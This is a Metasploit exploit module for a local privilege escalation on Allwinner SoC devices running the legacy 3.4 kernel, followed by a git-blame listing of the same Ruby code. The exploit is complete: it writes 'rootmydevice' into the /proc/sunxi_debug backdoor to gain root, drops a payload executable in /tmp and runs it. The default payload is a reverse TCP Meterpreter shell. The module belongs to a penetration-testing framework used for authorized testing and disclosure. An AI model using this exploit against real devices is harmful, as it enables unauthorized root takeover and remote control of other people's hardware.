metasploit-framework/modules/exploits/multi/local/allwinner_backdoor.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
        "Description"    => %q{
          This module attempts to exploit a debug backdoor privilege escalation in
          Allwinner SoC based devices.
          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
          Vulnerable OS: all OS images available for Orange Pis,
                         any for FriendlyARM's NanoPi M1,
                         SinoVoip's M2+ and M3,
                         Cuebietech's Cubietruck +
                         Linksprite's pcDuino8 Uno
          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
        },
        "License"        => MSF_LICENSE,
        "Author"         =>
          [
            "h00die <mike@stcyrsecurity.com>",  # Module
            "KotCzarny"                         # Discovery
          ],
        "Platform"       => [ "android", "linux" ],
        "DisclosureDate" => "Apr 30 2016",
        "DefaultOptions" => {
          "payload" => "linux/armle/mettle/reverse_tcp"
        },
        "Privileged"     => true,
        "Arch"           => ARCH_ARMLE,
        "References"     =>
          [
            [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
            [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
                     "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
            [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
          ],
        "SessionTypes"   => [ "shell", "meterpreter" ],
        'Targets'        =>
          [
            [ 'Auto',           { } ]
          ],
        'DefaultTarget'  => 0,
      ))
  end

  def check
    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
      pl = generate_payload_exe

      exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
      vprint_good "Backdoor Found, writing payload to #{exe_file}"
      write_file(exe_file, pl)
      cmd_exec("chmod +x #{exe_file}")

      vprint_good 'Escalating'
      cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
    else
      print_error "Backdoor #{backdoor} not found."
    end
  end
end
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

working ready for pr 2016-05-18 01:58:32 +00:00			`require "msf/core"`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00
post to local conversion 2016-09-23 02:08:24 +00:00			`class MetasploitModule < Msf::Exploit::Local`
			`Rank = ExcellentRanking`

module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`include Msf::Post::File`
			`include Msf::Post::Linux::Priv`
post to local conversion 2016-09-23 02:08:24 +00:00			`include Msf::Exploit::EXE`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00
added documentation and minor style tweaks 2016-05-24 02:59:44 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
more descriptive note per @sempervictus 2016-05-18 23:08:01 +00:00			`"Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",`
working ready for pr 2016-05-18 01:58:32 +00:00			`"Description" => %q{`
additional description 2016-05-18 02:07:33 +00:00			`This module attempts to exploit a debug backdoor privilege escalation in`
			`Allwinner SoC based devices.`
			`Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4`
			`Vulnerable OS: all OS images available for Orange Pis,`
			`any for FriendlyARM's NanoPi M1,`
			`SinoVoip's M2+ and M3,`
			`Cuebietech's Cubietruck +`
			`Linksprite's pcDuino8 Uno`
			`Exploitation may be possible against Dragon (x10) and Allwinner Android tablets`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`},`
working ready for pr 2016-05-18 01:58:32 +00:00			`"License" => MSF_LICENSE,`
			`"Author" =>`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`[`
working ready for pr 2016-05-18 01:58:32 +00:00			`"h00die <mike@stcyrsecurity.com>", # Module`
			`"KotCzarny" # Discovery`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`],`
working ready for pr 2016-05-18 01:58:32 +00:00			`"Platform" => [ "android", "linux" ],`
			`"DisclosureDate" => "Apr 30 2016",`
post to local conversion 2016-09-23 02:08:24 +00:00			`"DefaultOptions" => {`
			`"payload" => "linux/armle/mettle/reverse_tcp"`
			`},`
			`"Privileged" => true,`
			`"Arch" => ARCH_ARMLE,`
working ready for pr 2016-05-18 01:58:32 +00:00			`"References" =>`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`[`
working ready for pr 2016-05-18 01:58:32 +00:00			`[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],`
added documentation and minor style tweaks 2016-05-24 02:59:44 +00:00			`[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \`
			`"https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],`
working ready for pr 2016-05-18 01:58:32 +00:00			`[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`],`
post to local conversion 2016-09-23 02:08:24 +00:00			`"SessionTypes" => [ "shell", "meterpreter" ],`
			`'Targets' =>`
			`[`
			`[ 'Auto', { } ]`
			`],`
			`'DefaultTarget' => 0,`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`))`
			`end`

post to local conversion 2016-09-23 02:08:24 +00:00			`def check`
			`backdoor = '/proc/sunxi_debug/sunxi_debug'`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`if file_exist?(backdoor)`
post to local conversion 2016-09-23 02:08:24 +00:00			`Exploit::CheckCode::Appears`
			`else`
			`Exploit::CheckCode::Safe`
			`end`
			`end`

			`def exploit`
			`backdoor = '/proc/sunxi_debug/sunxi_debug'`
			`if file_exist?(backdoor)`
			`pl = generate_payload_exe`

			`exe_file = "/tmp/#{rand_text_alpha(5)}.elf"`
			`vprint_good "Backdoor Found, writing payload to #{exe_file}"`
			`write_file(exe_file, pl)`
			`cmd_exec("chmod +x #{exe_file}")`

			`vprint_good 'Escalating'`
			`cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`else`
working ready for pr 2016-05-18 01:58:32 +00:00			`print_error "Backdoor #{backdoor} not found."`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`end`
			`end`
			`end`